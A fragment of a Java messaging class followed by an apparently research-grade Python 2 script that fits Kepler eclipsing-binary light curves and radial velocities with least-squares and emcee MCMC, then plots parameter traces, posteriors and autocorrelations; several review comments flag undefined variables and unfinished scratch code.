totBuff.appendBuffer(body);
totBuff.setInt(0, totBuff.length() - 4);
socket.write(totBuff);
}
byte type() {
return Sendable.TYPE_MESSAGE;
}
// Copy for local delivery: deep-copies the body, shallow-copies metadata.
// Note: 'bus' is intentionally not copied.
Message copy() {
Message msg = new Message(address, body.copy());
msg.messageID = this.messageID;
msg.sender = this.sender;
msg.requiresAck = this.requiresAck;
return msg;
}
}
|
<reponame>savvytruffle/cauldron
import matplotlib
matplotlib.use('agg')
import sys, itertools, time, os
print(os.uname())
import emcee
from emcee.utils import MPIPool
#from helper_funcs import *
from eb_fitting import *
kic = int(sys.argv[1])
try:
prefix = sys.argv[2]
except:
prefix = '/astro/store/gradscratch/tmp/windemut/eb_fitting_mini/'
prefix = prefix + str(kic)+'/'
#kic = int(float(sys.argv[1]))
#period, tpe, esinw, ecosw, rsum, rrat, b, frat, q1, q2, q3, q4 = np.array(sys.argv[2:-2], dtype=float)
#nwalkers, niter = int(sys.argv[-2]), int(sys.argv[-1])
clobber_lc=False #overwrite LC only fits?
clobber_sed=True #overwrite SED only fits?
kiclist, perlist, pdeplist, sdeplist, morphlist = np.loadtxt('data/kebproperties_0216.dat',
usecols=(0, 1, 3, 4, 8), unpack=True, delimiter=';')
#goodlist = (morphlist<0.6) & (pdeplist>0.1) & (sdeplist>0.01) & (perlist > 1.)
goodlist = (perlist>0)
excludelist = get_excludelist(fname='data/sed_flag_file_0328')
keblat = Keblat(preload=False)
#keblat.loadiso2()
keblat.loadiso2(isoname='isodata_jun4.dat')
keblat.loadsed(sedfile='data/kepsedall_0216.dat')
keblat.loadvkeb(filename='data/kebproperties_0216.dat')
goodlist_ind = np.where(kiclist[goodlist].astype(int) == kic)[0]
if len(goodlist_ind)>1:
goodlist_ind=goodlist_ind[0]
goodv = keblat.kiclookup(kic, target=keblat.vkeb[:, 0])
keblat.loadlc(kic, keblat.vkeb[goodv, [1, 2, 5, 6, 7]], clip_tol=2.0, local_db=True)
keblat.morph = keblat.vkeb[goodv, 8]
magsobs, emagsobs, extinction, glat, z0 = keblat.getmags(kic)
ebv = extinction[0]
if np.isnan(z0):
z0 = keblat.zsun
#print "Loading SED data, excluding ", excludelist[kic]
# Per-target SED band exclusions; fall back to "exclude nothing" when this
# KIC has no entry.  Catch only lookup failures instead of a bare except,
# so genuine errors (typos, KeyboardInterrupt) still propagate.
try:
    exclusive = excludelist[kic]
except (KeyError, IndexError):
    exclusive = []
keblat.isoprep(magsobs, emagsobs, extinction, glat, z0, exclude=exclusive)#exclude=[]) #excludelist[goodlist_ind])#'gmag','rmag','imag','zmag'])
# Initial ephemeris and eccentricity-vector guesses from the catalog row.
period, tpe = keblat.vkeb[goodv, 1], keblat.vkeb[goodv, 2]
ecosw, esinw = keblat.vkeb[goodv, -2], keblat.vkeb[goodv, -1]
# Nudge exactly-zero eccentricity components off the degenerate point.
if ecosw == 0: ecosw = 1e-5
if esinw == 0: esinw = 1e-5
frat = (keblat.vkeb[goodv, 4]/keblat.vkeb[goodv, 3])  # depth ratio as a flux-ratio guess
ebv_arr, ebv_sig, ebv_dist_bounds, ebv_bounds = None, None, None, None#get3dmap(kic)
# A negative secondary-eclipse width flags "no secondary detected".
if keblat.swidth < 0.:
    print "No secondary eclipses detected. Exiting."
    sys.exit()
#if np.median(np.unique(keblat.crowd)) < 0.5:
#    print "Crowding > 0.5. Exiting."
#    sys.exit()
# Wider eclipses get a tighter phase-clipping tolerance.
if (max(keblat.pwidth, keblat.swidth) > 0.04) and (keblat.pwidth+keblat.swidth > 0.091):
    clip_tol = 1.4
#elif ((keblat.pw3idth > 0.01) and (keblat.swidth > 0.01)) or (keblat.pwidth+keblat.swidth>:
#    clip_tol = 1.5
else:
    clip_tol = 1.7
print("Clip tolerance = {0}".format(clip_tol))
keblat.updatephase(tpe, period, clip_tol=clip_tol)
check_dir_exists(prefix)  # make sure the output directory exists
keblat.start_errf(prefix+'lcfit.err')  # error/log file for the LC fit
# rvdata = np.loadtxt('data/{0}.rv'.format(kic), delimiter=';')
# uncomment the code segment below if want to fit RV
# //load rv data
# //make init guess for masses + K offset
# m1, m2, k0 = keblat.rvprep(rvdata[:,0], rvdata[:,1], rvdata[:,3], rvdata[:,2], rvdata[:,4])
# //run light-curve opt first
# //make sure keblat.pars are updated...
# lcmod, lcpol = keblat.lcfit(opt_lcpars, keblat.jd[keblat.clip].....)
# //update the bounds to make them stricter
# keblat.updatebounds('period', 'tpe', 'esinw', 'ecosw')
# rvpars = [m1+m2, m2/m1, opt_lcpars[3], opt_lcpars[4], opt_lcpars[5], opt_lcpars[6], keblat.pars['inc'], k0, 0]
# //optimize rvparameters using opt_lc + init rv guesses
# opt_rvpars = opt_rv(msum=m1+m2, mrat=m2/m1, period=opt_lcpars[3], tpe=opt_lcpars[4], esinw=opt_lcpars[5],
#                     ecosw=opt_lcpars[6], inc=keblat.pars['inc'], k0=k0, rverr=0)
# //fix msum from rv fit to lc fit
# opt_lcpars[0] = opt_rvpars[0]
# lcpars2 = opt_lc(opt_lcpars, keblat.jd, keblat.phase, keblat.flux, keblat.fluxerr, keblat.crowd, keblat.clip, set_upperb = 2.0, vary_msum=False)
# //then optimize both simultaneously
#opt_lcrvpars = opt_lcrv(keblat,msum=opt_rvpars[0], mrat=opt_rvpars[1],
#                        rsum=lcpars2[1], rrat=lcpars2[2], period=lcpars2[3],
#                        tpe=lcpars2[4], esinw=lcpars2[5], ecosw=lcpars2[6],
#                        b=lcpars2[7], frat=lcpars2[8], q1=lcpars2[-4],
#                        q2=lcpars2[-3], q3=lcpars2[-2], q4=lcpars2[-1],
#                        lcerr=0.0, k0=opt_rvpars[-2], rverr=0.)
# Starting guesses: limb-darkening coefficients, then age/scale-height/distance.
q1, q2, q3, q4 = 0.01, 0.01, 0.01, 0.01
age, h0, dist = 9.2, 119., 850.
# Contiguous light-curve chunks split at cadence-number gaps.
chunks = identify_gaps(keblat.cadnum, retbounds_inds=True)
chunks = np.delete(chunks, np.where(np.diff(chunks)<2)[0])  # drop < 2-cadence chunks
# Chi^2 acceptance threshold scaled by the median per-chunk flux scatter.
lcchi2_threshold = 5./np.nanmedian(np.array([np.nanmedian(abs(keblat.flux[chunks[ii]:chunks[ii+1]] -
                                                              np.nanmedian(keblat.flux[chunks[ii]:chunks[ii+1]])))
                                             for ii in range(len(chunks)-1)]))
keblat.pars['lcerr'] = 1e-5
# NOTE(review): `blah` is never defined, so this raises NameError and halts
# the script here -- presumably a deliberate debug stop; confirm before removing.
print(blah)
################################### LC FITTING ########################################
# Light-curve-only fit: grid-search starting points, then lmfit optimization.
# NOTE(review): indentation was lost in extraction and is reconstructed here;
# in particular whether the bestlcchi2/unpack lines after the else branch are
# inside it is a best guess -- verify against the original file.
if not os.path.isfile(prefix+'lcpars.lmfit2') or clobber_lc:
    # make initial guesses for rsum and f2/f1, assuming main sequence equal mass binary
    rsum = scipy.optimize.fmin_l_bfgs_b(estimate_rsum, 1.0,
                                        args=(period, 2*(keblat.pwidth+keblat.swidth)),
                                        bounds=[(1e-3, 1e3)], approx_grad=True)[0][0]
    # ew = scipy.optimize.fmin(tse_residuals, np.array([1e-3, ecosw]),
    #                          args=(period, tpe, tpe+keblat.sep*period))
    b = flatbottom(keblat.phase[keblat.clip], keblat.flux[keblat.clip], keblat.sep, keblat.swidth)
    rrat = guess_rrat(sdeplist[goodlist][goodlist_ind], pdeplist[goodlist][goodlist_ind])
    frat = rrat**(2.5)  # flux ratio from radius ratio (rough main-sequence scaling)
    if rsum > 10:
        msum = 2.0  # cap the mass-sum guess for very large rsum
    else:
        msum = rsum
    # Trial grid of (esinw, ecosw) starting points, both signs of esinw.
    ew_trials = [[esinw, ecosw], [-esinw, ecosw]]
    for jj in np.linspace(0.01, .5, 5):
        ew_trials = ew_trials + [[jj, ecosw], [-jj, ecosw]]
    #[[esinw, ecosw], [-esinw, ecosw], [-0.521, ecosw], [-0.332, ecosw], [-0.142, ecosw], [0.521, ecosw], [0.332, ecosw], [0.142, ecosw], [-.2]]
    lcpars0 = np.array([msum, rsum, rrat, period, tpe, esinw, ecosw, b, frat, q1, q2, q3, q4])
    ew = ew_search_lmfit(ew_trials, keblat, lcpars0, (period, tpe, tpe+keblat.sep*period), fit_ecosw=False, polyorder=1)
    # Impact-parameter and radius-ratio trial grids, initial guess first.
    b_trials = [0.01, 0.1, 0.4, 0.8, 1.2]
    rrat_trials = [0.3, 0.7, 0.95]
    b_trials = [b] + [float(jj) for jj in np.array(b_trials)[~np.in1d(b_trials, b)]]
    rrat_trials = [rrat] + [float(jj) for jj in np.array(rrat_trials)[~np.in1d(rrat_trials, rrat)]]
    lc_search_counts=0
    bestlcchi2 = 1e25
    ###################################################################################
    ########################### LC ONLY OPTIMIZATION FIRST ############################
    ###################################################################################
    keblat.updatebounds('period', 'tpe', partol=0.1)
    # if pdeplist[goodlist][goodlist_ind]<0.1:
    #     keblat.parbounds['rrat'] = [1e-6, 1.]
    #     keblat.parbounds['frat'] = [1e-8, 1.]
    # Very shallow eclipses: loosen the radius/flux-ratio bounds.
    if sdeplist[goodlist][goodlist_ind] < 0.08 and pdeplist[goodlist][goodlist_ind] < 0.08:
        keblat.parbounds['rrat'] = [1e-6, 1]
        keblat.parbounds['frat'] = [1e-8, 1]
    # Keep esinw^2 + ecosw^2 within 0.9^2 (eccentricity bound).
    if abs(ecosw) < 0.015:
        keblat.parbounds['ecosw'] = [-0.02, 0.02]
        keblat.parbounds['esinw'] = [-.9, .9]
    else:
        keblat.updatebounds('ecosw', partol=0.1)
        keblat.parbounds['esinw'] = [-np.sqrt(.9**2-ecosw**2), np.sqrt(.9**2-ecosw**2)]
    # Exhaustive search over (b, rrat, esinw/ecosw) starting combinations.
    for i_b, i_rrat, i_ew in list(itertools.product(b_trials, rrat_trials, [ew, [esinw, ecosw]])):
    # for i_b, i_rrat, i_ew in list(itertools.product(b_trials, rrat_trials, [[esinw, ecosw]])):
    #     lcpars0 = np.array([rsum, rsum, i_rrat, period, tpe, ew[0], ew[1], i_b, i_rrat**(2.5),
    #                         q1, q2, q3, q4])
        #upper_b = 2.*i_b if i_b==0.01 else 3.0
        #keblat.parbounds['b'][1] = upper_b
        opt_lcpars0 = opt_lc(keblat, msum=msum, rsum=rsum, rrat=i_rrat, period=period, tpe=tpe, esinw=i_ew[0],
                             ecosw=i_ew[1], b=i_b, frat=i_rrat**2.5, q1=q1, q2=q2, q3=q3, q4=q4)
        # Reduced chi^2 of the fit with a 2nd-order detrending polynomial.
        lcchi2 = np.sum(rez(opt_lcpars0, keblat, polyorder=2)**2)/(np.sum(keblat.clip) - len(opt_lcpars0) - 1)
        if (lcchi2 < bestlcchi2) or (lc_search_counts < 1):
            print "Saving from this run:", lcchi2, bestlcchi2, lc_search_counts
            bestlcchi2 = lcchi2*1.0
            opt_lcpars = opt_lcpars0.copy()
        lc_search_counts+=1
        # Early exit once a good, physical (rrat <= 1) fit is found.
        if (bestlcchi2 <= 1.5) and opt_lcpars[2]<=1.0:
            print "These init b, rrat, esinw, ecosw lcpars are: ", i_b, i_rrat, ew
            break
    # opt_lcpars0 = opt_lc(lcpars0, keblat.jd, keblat.phase, keblat.flux, keblat.fluxerr, keblat.crowd, \
    #                      keblat.clip, set_upperb=upper_b, prefix=prefix)
    # lcchi2 = np.sum(rez(opt_lcpars0, polyorder=2)**2)/np.sum(keblat.clip)
    # if lcchi2 < bestlcchi2:
    #     bestlcchi2 = lcchi2*1.0
    #     opt_lcpars = opt_lcpars0 * 1.0
    # make_lc_plots(kic, opt_lcpars0, prefix, polyorder=2, suffix='lc_opt')
    try:
        keblat.plot_lc(opt_lcpars, prefix, polyorder=2, suffix='lc_opt2', savefig=True)
    except Exception, e:
        print str(e)
    # Persist the best parameters either way; bail out if the fit is poor.
    if bestlcchi2 < lcchi2_threshold:
        print "Saving lmfit lcpars..."
        np.savetxt(prefix+'lcpars.lmfit2', opt_lcpars)
    else:
        print("Bestlcchi2 = {0}, exiting.".format(bestlcchi2))
        np.savetxt(prefix+'lcpars.lmfit2', opt_lcpars)
        sys.exit()
else:
    print "Loading lcpars lmfit"
    opt_lcpars = np.loadtxt(prefix+'lcpars.lmfit2')
    bestlcchi2 = np.sum(rez(opt_lcpars[:13], keblat, polyorder=2)**2)/(np.sum(keblat.clip) - len(opt_lcpars) - 1)
    msum, rsum, rrat, period, tpe, esinw, ecosw, b, frat, q1, q2, q3, q4 = opt_lcpars[:13]
#opt_lcpars0 = opt_lc(keblat, msum=msum, rsum=rsum, rrat=rrat, period=period,
#                     tpe=tpe, esinw=esinw, ecosw=ecosw, b=b, frat=frat, q1=q1,
#                     q2=q2, q3=q3, q4=q4, vary_msum=False, fit_crowd=True)
# Refit with per-quarter crowding parameters appended after the 13 LC params.
opt_lcpars0 = opt_lc_crowd(keblat, msum=msum, rsum=rsum, rrat=rrat, period=period,
                           tpe=tpe, esinw=esinw, ecosw=ecosw, b=b, frat=frat,
                           q1=q1, q2=q2, q3=q3, q4=q4, vary_msum=False)
crowd_fits = keblat.broadcast_crowd(keblat.quarter, opt_lcpars0[13:])
keblat.crowd = crowd_fits
lcchi2 = np.sum(rez(opt_lcpars0[:13], keblat, polyorder=2)**2)/(np.sum(keblat.clip) - len(opt_lcpars0) - 1)
# Keep the crowding fit only if it improves chi^2 and did not collapse to 1.
if (lcchi2 < bestlcchi2) and ((abs(opt_lcpars0[13:]-1)<1e-8).sum() < 1):
    print "Saving from this crowding fit run:", lcchi2, bestlcchi2
    bestlcchi2 = lcchi2*1.0
    opt_lcpars = opt_lcpars0[:13].copy()
    crowd = opt_lcpars0[13:]
    np.savetxt(prefix+'lcpars_wcrowd.lmfit2', opt_lcpars0)
else:
    # Fall back to the pipeline CROWDSAP values.
    crowd_fits = keblat.broadcast_crowd(keblat.quarter, keblat._crowdsap)
    keblat.crowd = crowd_fits
    crowd = keblat._crowdsap.ravel()
_, _ = keblat.lcfit(opt_lcpars[:13], keblat.jd, keblat.quarter, keblat.flux, keblat.dflux, keblat.crowd, polyorder=0)
keblat.updatephase(keblat.pars['tpe'], keblat.pars['period'], clip_tol=keblat.clip_tol)
# Append a log-scatter estimate as the lcerr parameter.
opt_lcpars = np.append(opt_lcpars, np.log(np.median(abs(np.diff(keblat.flux)))))
####################### RV FITS ##########################
# Radial-velocity observations: time, RV1, RV1 err, RV2, RV2 err
# (multiplied by 1e3 below before rvprep -- presumably km/s -> m/s; confirm).
t, rv1, rv1err, rv2, rv2err = np.loadtxt('/astro/users/windemut/cauldron/data/{}.rv'.format(kic), usecols=(2,3,4,5,6), unpack=True)
# Grid of esinw values (both signs plus zero) for exploratory RV model plots.
esinw_array = np.sort(np.concatenate((np.linspace(0.1, 0.6, 4), -np.linspace(0.1, 0.6, 4), [0])))
for ii in range(len(esinw_array)):
    for jj in range(len(esinw_array)):
        if jj==0:
            lw=3  # highlight the first inner-loop curve
        else:
            lw=1
        # NOTE(review): `rvpars` and `rvt` are not defined anywhere above --
        # this exploratory loop cannot run as written; scratch code to revisit.
        _rvpars = rvpars.copy()
        _rvpars[4] = esinw_array[ii]
        _rvpars[5] = esinw_array[jj]
        rvmod = keblat.rvfit(_rvpars, rvt)
        print('C{}-'.format(ii), '{}'.format(1-jj/10.), '{}'.format(esinw_array[ii]))
        plt.plot(np.linspace(0,1,100), rvmod[0], 'C{}-'.format(ii), lw=lw, alpha=1-jj/10., label='{}'.format(esinw_array[ii]))
# NOTE(review): m1, m2, k0 are used here but only assigned on the NEXT line
# (keblat.rvprep); these two statements look swapped -- confirm intended order.
opt_rvpars = opt_rv(keblat, msum=m1+m2, mrat=m2/m1, period=opt_lcpars[3], tpe=opt_lcpars[4], esinw=opt_lcpars[5], ecosw=opt_lcpars[6], inc=keblat.pars['inc'], k0=k0, rverr=0)
m1, m2, k0 = keblat.rvprep(t, rv1*1e3, rv2*1e3, rv1err*1e3, rv2err*1e3)
def lnprob_lcrv(lcrvpars0, BF_constraint=None, retro=False):
    """Log-posterior for the joint light-curve + RV fit.

    The last and third-from-last entries of the parameter vector are sampled
    in log space and exponentiated before the likelihood call.  When
    ``BF_constraint`` is given, a Gaussian prior (sigma = 0.2) ties parameter
    index 9 (presumably the flux ratio -- confirm) to that value.  Returns
    -inf for out-of-bounds or non-finite evaluations.
    """
    pars = lcrvpars0.copy()
    logprior = keblat.lnprior_lcrv(pars)
    if np.isinf(logprior):
        return -np.inf  # outside the prior bounds
    if BF_constraint is not None:
        logprior -= 0.5 * ((pars[9] - BF_constraint) / 0.2) ** 2
    # Back-transform the log-space parameters before evaluating the likelihood.
    pars[-1] = np.exp(pars[-1])
    pars[-3] = np.exp(pars[-3])
    loglike = keblat.lnlike_lcrv(pars, qua=np.unique(keblat.quarter), retro=retro)
    if not np.isfinite(loglike):
        return -np.inf
    return logprior + loglike
# MCMC configuration.
nwalkers=128
niter=100000
clobber=False  # overwrite an existing .mcmc chain file?
# Broadening-function flux ratios (and the KICs they belong to) used as an
# external constraint for shallow-eclipse systems.
BF_ratios = np.array([0.62, 0.77, 0.46, 0.39, 0.997, 0.65, 1./0.89])
BF_ratios_kics = np.array([5285607, 6864859, 6778289, 6449358, 4285087, 6131659, 6781535])
if ((1-keblat.pe_depth)<=0.1 and (1-keblat.se_depth)<=0.1) or (pdeplist[goodlist_ind]<=0.1 and sdeplist[goodlist_ind]<=0.1):
    BF_constraint=BF_ratios[BF_ratios_kics==kic][0]
else:
    BF_constraint=None
header = prefix+'lcrv_BF{}_'.format(0 if BF_constraint is None else 1)
footer = str(nwalkers)+'x'+str(niter/1000)+'k_final'  # Py2 integer division
mcfile = header+footer+'.mcmc'
# NOTE(review): `opt_lcrvpars` is not defined in this script as written --
# presumably produced by the commented-out opt_lcrv step earlier; confirm.
pars = opt_lcrvpars.copy()
#pars[-3] = np.log(opt_lcrvpars[-3])
#pars[-1] = np.log(np.nanmedian(keblat.rv1_err_obs))
ndim=len(pars)
# Initialize walkers in a tiny Gaussian ball around `pars`, clipped to bounds.
p0_scale = np.ones(ndim)*1e-7
p0 = np.array([pars + p0_scale*pars*np.random.randn(ndim) for ii in range(nwalkers)])
for ii in range(ndim):
    p0[:,ii] = np.clip(p0[:,ii], keblat.parbounds[parnames_dict['lcrv'][ii]][0], keblat.parbounds[parnames_dict['lcrv'][ii]][1])
# Sanity check: every starting point must yield a finite log-probability.
ll0 = np.zeros(nwalkers)
for ii in range(nwalkers):
    # NOTE(review): `retro` is undefined at module scope here -- confirm.
    ll0[ii] = lnprob_lcrv(p0[ii,:], BF_constraint=BF_constraint, retro=retro)
if np.any(np.isinf(ll0)):
    print("Initial Gaussian ball of parameters yield -inf lnprob, check bounds")
    sys.exit()
if os.path.isfile(mcfile) and not clobber:
    print("File {0} already exists... do you want to clobber?".format(mcfile))
    sys.exit()
outf=open(mcfile, "w")  # create/truncate the chain file
outf.close()
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob_lcrv, threads=4, args=(BF_constraint,retro))
start_time = time.time()
print("Running {0}k MCMC chain".format(niter/1000))
# Stream the chain to disk every 10 iterations instead of keeping it in memory.
for res in sampler.sample(p0, iterations=niter, storechain=False):
    if sampler.iterations % 10 == 0:
        position = res[0]
        outf = open(mcfile, "a")
        for k in range(position.shape[0]):
            outf.write("{0} {1} {2} {3} {4}\n".format(sampler.iterations,
                       k, sampler.acceptance_fraction[k], res[1][k],
                       " ".join([str(ii) for ii in position[k]])))
        outf.close()
    if sampler.iterations % 10000 == 0:
        print("Time elapsed since niter={0}:{1}".format(sampler.iterations,
                                                        time.time()-start_time))
print("Total time elapsed for MCMC run:{0}".format(time.time()-start_time))
print("Total acceptance fraction:{0}".format(np.mean(sampler.acceptance_fraction)))
try:
    print("Total autocorr time:{0}".format(np.mean(sampler.acor)))
except:
    print("Could not compute autocorr time...")
# Post-process the saved chain: reshape into (step, walker, param) arrays.
burnin=None
data=np.loadtxt(mcfile)
isonames = parnames_dict['lcrv']
blob_names=None
iwalker = np.arange(nwalkers)
afrac = np.empty((data.shape[0]/nwalkers, nwalkers))  # Py2 integer division
logli = afrac*0.
params = np.empty((data.shape[0]/nwalkers, nwalkers, len(isonames)))
strays = []
for jj in iwalker:
    afrac[:,jj] = data[jj::nwalkers,2]  # acceptance-fraction column
    logli[:,jj] = data[jj::nwalkers,3]  # log-probability column
    # Flag walkers whose acceptance fraction is below 0.1 for >= 2/3 of steps.
    if len(afrac[:,jj][(afrac[:,jj]<0.1)])>=0.66*len(afrac[:,jj]):
        strays.append(jj)
    for ii in range(len(isonames)):
        params[:, jj, ii] = data[jj::nwalkers, ii+4]
# Maximum-likelihood sample across all steps and walkers.
mostlike = np.where(logli == np.nanmax(logli))
mlpars = params[:,:,:][mostlike][0]
print "Max likelihood out of all samples: ", logli[:,:][mostlike]
for kk in range(len(isonames)):
    print("""{0} = {1}""".format(str(isonames[kk]), mlpars[kk]))
# Burn-in heuristic: first saved step where the median logli crosses the mean
# (x10 because the chain is saved every 10 iterations).
if burnin is None:
    print "Burn-in = when logli first crosses median value"
    burnin = np.where(np.nanmedian(logli, axis=1) >= np.nanmean(logli))[0][0] * 10
_, bad_walkers, walker_percentiles = get_stray_walkers(params, nwalkers, ndim, burnin=burnin)
strays = iwalker[bad_walkers>1]
print("{} bad/stray walkers = {}".format(len(strays), strays))
keep = iwalker[~np.in1d(iwalker, strays)]
if len(strays)>=0.33*nwalkers:
    keep = iwalker  # too many flagged; keep all walkers instead
# Parameter trace plots (one panel per parameter) with marginal histograms.
fig = plt.figure(figsize=(16, 16))
for ii in range(len(isonames)):
    ax = fig.add_subplot(int(len(isonames)/2)+1, 2, ii+1)
    ax.plot(params[:, :, ii])
    ax.plot(np.nanmean(params[:,:,ii].T, axis=0), 'k-', lw=2, alpha=0.2)
    ax.plot([burnin, burnin], plt.ylim(), 'y-', lw=2.0)  # burn-in marker
    ax.set_xlabel('N/10 iteration')
    ax.set_ylabel(isonames[ii])
    divider = make_axes_locatable(ax)
    axhist = divider.append_axes("right", size=1.2, pad=0.1, sharey=ax)
    # NOTE(review): `normed=` was removed in matplotlib 3.x (use density=).
    axhist.hist(params[:,:,ii], 100, histtype='step', alpha=0.6, normed=True,
                orientation='horizontal')
    axhist.hist(params[:,:,ii].ravel(), 100, histtype='step', color='k',
                normed=True, orientation='horizontal')
    plt.setp(axhist.get_yticklabels(), visible=False)
# Final panel: log-likelihood trace.
ax = fig.add_subplot(int(len(isonames)/2)+1, 2, len(isonames)+1)
ax.plot(logli)
ax.axvline(burnin, color='y', lw=2.0)
ax.set_xlabel('N/10 iteration')
ax.set_ylabel('logL')
plt.suptitle("KIC {} Parameter Trace".format(keblat.kic))
plt.savefig(header+footer+'_parameters.png')
# 16/50/84 percentile summaries (median, +err, -err) over post-burn-in,
# non-stray samples.
bfpars = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]),
             zip(*np.nanpercentile(params[burnin:,keep,:].reshape((-1, ndim)),
                                   [16, 50, 84], axis=0)))
try:
    # NOTE(review): `blobs` is never defined here (blob_names is None), so
    # this always falls through to the except branch.
    blobpars = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]),
                   zip(*np.nanpercentile(blobs[burnin:,keep,:].reshape((-1, len(blob_names))),
                                         [16, 50, 84], axis=0)))
except:
    print("No blobs.")
print("MCMC result: ")
print("Accep. Frac = ", np.mean(afrac[burnin:, keep]))
# Write the ML sample and percentile summaries to a .pars file.
bffile = open(header+footer+'mcmc.pars', "w")
bffile.write("""{}\n""".format(" ".join([str(mp) for mp in mlpars])))
for kk in range(len(isonames)):
    print("""{0} = {1[0]} +{1[1]} -{1[2]}""".format(str(isonames[kk]),
                                                    bfpars[kk]))
    bffile.write("""#{0} = {1[0]} +{1[1]} -{1[2]}\n""".format(str(isonames[kk]),
                                                              bfpars[kk]))
# Derived (change-of-variable) quantities: individual masses/radii, inc, e.
changeofvar_names = ['m1', 'm2', 'r1', 'r2', 'inc', 'e']
params_changeofvar = np.zeros((params.shape[0], params.shape[1], len(changeofvar_names)))
params_changeofvar[:,:,0], params_changeofvar[:,:,1] = keblat.sumrat_to_12(params[:,:,0], params[:,:,1])
params_changeofvar[:,:,2], params_changeofvar[:,:,3] = keblat.sumrat_to_12(params[:,:,2], params[:,:,3])
params_changeofvar[:,:,4] = keblat.get_inc(params[:,:,8], params_changeofvar[:,:,2], keblat.get_a(params[:,:,4], params[:,:,0]))
params_changeofvar[:,:,5] = np.sqrt(params[:,:,6]**2 + params[:,:,7]**2)
bfpars_changeofvar = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]),
                         zip(*np.percentile(params_changeofvar.reshape((-1, len(changeofvar_names))),
                                            [16, 50, 84], axis=0)))
for kk in range(len(changeofvar_names)):
    print("""{0} = {1[0]} +{1[1]} -{1[2]}""".format(str(changeofvar_names[kk]),
                                                    bfpars_changeofvar[kk]))
    bffile.write("""#{0} = {1[0]} +{1[1]} -{1[2]}\n""".format(str(changeofvar_names[kk]),
                                                              bfpars_changeofvar[kk]))
bffile.close()
mlpars[[-1, -3]] = np.exp(mlpars[[-1, -3]])  # back-transform log-space params
keblat.plot_lcrv(mlpars, header+footer, '', savefig=True, thresh=12., retro=retro)
plt.savefig(header+footer+'.eps')
np.savetxt(header+footer+'.crowd', crowd)
import corner  # corner plots for posterior visualization
plt.figure(figsize=(16, 16))
# Thin the post-burn-in samples to at most ~50k points for the corner plot.
thin_by = np.clip((params.shape[0]-burnin)*params.shape[1]/50000, 1, 50000)
print("burned-in param matrix is {}; thinning by {}".format(params[burnin:, :, :].shape, thin_by))
# Drop parameters with (numerically) zero variance -- corner cannot plot them.
post_inds = np.arange(len(isonames))
post_inds = np.delete(post_inds, np.where(np.nanstd(params[burnin::thin_by, :, :], axis=(0,1)) < 1e-12)[0])
try:
    corner.corner(params[burnin::thin_by, keep, :][:,:,post_inds].reshape((-1, len(post_inds))),
                  labels=np.array(isonames)[post_inds], quantiles=[0.16, 0.5, 0.84],
                  show_titles=True, title_kwargs={"fontsize": 11})
    plt.suptitle("KIC {}".format(keblat.kic))
    plt.savefig(header+footer+'_posteriors.png')
except Exception, e:
    print(str(e), post_inds)
print "Making ACF plots now."
# Autocorrelation-function diagnostics, one panel per parameter.
c=5  # window-size factor passed to get_acf_tau
tau = np.zeros((ndim))
fig = plt.figure(figsize=(16, 16))
fig.subplots_adjust(hspace=0.0)
x = np.arange(params.shape[0])
for ii in range(ndim):
    ax = fig.add_subplot(ndim/3+1, 3, ii+1)
    print("{}".format(isonames[ii]))
    tau[ii], mean_of_acfs, acf = get_acf_tau(params[:, keep, ii], c=c)
    ax.plot(acf, alpha=0.5)
    ax.plot(mean_of_acfs, 'k-', lw=1.5, alpha=0.8, label='mean(acfs)')
    ax.text(tau[ii]*1.1, 0.8, '{}'.format(int(tau[ii])))
    ax.plot(x, np.exp(-x/tau[ii]), '-', lw=1.5, alpha=0.8)  # exp(-lag/tau) reference curve
    ax.set_xlabel('N/10 iteration lag')
    ax.set_ylabel('{}'.format(isonames[ii]))
plt.suptitle("KIC {} ACF".format(keblat.kic))
plt.savefig(header+footer+'_ACF.png')
#################### CODE for KIC 6864859 heartbeat star #####################
# NOTE(review): target-specific scratch code; several names used below
# (lcpars, bad_eclipses, omega, e) are not defined in this script as written.
mod,poly = keblat.jd*0., keblat.jd*0.
mod[keblat.clip],poly[keblat.clip] = keblat.lcfit(lcpars[:13], keblat.jd[keblat.clip], keblat.quarter[keblat.clip],
                                                  keblat.flux[keblat.clip], keblat.dflux[keblat.clip], keblat.crowd[keblat.clip],
                                                  polyorder=2)
# Plot the first 9 eclipse cycles with the model overlaid.
for ii in range(9):
    plt.subplot(3, 3, ii+1)
    clip = (keblat.jd >= (keblat.tpe+keblat.period*ii - 2*keblat.pwidth*keblat.period)) * \
           (keblat.jd <= (keblat.tse +keblat.period*ii+ 2.*keblat.swidth*keblat.period)) * (keblat.quality<2)
#    mod,poly = keblat.lcfit(lcpars[:13], keblat.jd[clip], keblat.quarter[clip],
#                            keblat.flux[clip], keblat.dflux[clip], keblat.crowd[clip],
#                            polyorder=1, ooe=False)
    plt.plot(keblat.jd[clip], keblat.flux[clip], '.')
    plt.plot(keblat.jd[clip*keblat.clip], (mod*poly)[keblat.clip * clip], '-')
#plt.ylim((0.999, 1.001))
# Build a regular time grid per eclipse cycle (0.0204 d cadence steps).
_Ncad = int(np.ceil((keblat.tse + 2*keblat.swidth*keblat.period -
                     keblat.tpe - 2*keblat.pwidth*keblat.period) / (0.0204)))
_Neclipses = int(np.ceil((keblat.jd[-1]-keblat.jd[0])/period))+1
_tgrid = np.arange(keblat.tpe - 2*keblat.pwidth*keblat.period,
                   keblat.tse + 2.1*keblat.swidth*keblat.period, 0.0204)
for ii in range(_Neclipses)[1:]:
    _tgrid = np.vstack((_tgrid,
                        np.arange(keblat.tpe+keblat.period*ii - 2*keblat.pwidth*keblat.period,
                                  keblat.tse+keblat.period*ii + 2.1*keblat.swidth*keblat.period, 0.0204)))
_fgrid = _tgrid.copy()*np.nan
# Interpolate detrended flux onto the grid, one eclipse cycle at a time.
for ii in range(_Neclipses):
#    clip = (keblat.jd >= (keblat.tpe+keblat.period*ii - 1.2*keblat.pwidth*keblat.period)) * (keblat.jd <= (keblat.tse +keblat.period*ii + 1.2*keblat.swidth*keblat.period))
    clip = ((abs(keblat.jd-(keblat.tpe+keblat.period*ii))<2*keblat.pwidth*keblat.period) | (abs(keblat.jd-(keblat.tse +keblat.period*ii))<2*keblat.swidth*keblat.period)) * (keblat.quality<2)
    mod,poly = keblat.lcfit(lcpars[:13], keblat.jd[clip], keblat.quarter[clip],
                            keblat.flux[clip], keblat.dflux[clip], keblat.crowd[clip],
                            polyorder=1)
